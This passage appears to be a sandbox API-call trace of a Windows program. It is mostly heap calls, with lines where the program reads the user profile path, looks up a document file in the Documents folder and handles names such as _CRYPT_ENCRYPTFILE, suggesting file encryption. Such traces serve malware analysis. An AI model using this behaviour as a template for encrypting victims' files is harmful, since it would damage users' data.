dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0265.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0265.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.963] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.964] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0265.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.964] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.965] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0265.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0265.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0265.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.971] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.975] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.976] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/MvKsZ2f3N9SAK.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37aaf350, ftCreationTime.dwHighDateTime=0x1d58910, ftLastAccessTime.dwLowDateTime=0x9afaf140, ftLastAccessTime.dwHighDateTime=0x1d58b71, ftLastWriteTime.dwLowDateTime=0x9afaf140, ftLastWriteTime.dwHighDateTime=0x1d58b71, nFileSizeHigh=0x0, nFileSizeLow=0x53c8, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="MvKsZ2f3N9SAK.pptx", cAlternateFileName="MVKSZ2~1.PPT")) returned 0xa874d0 [0265.976] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0265.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0265.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.977] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.977] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.977] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.978] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0265.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0265.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.992] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.992] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.992] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.994] RtlAllocateHeap 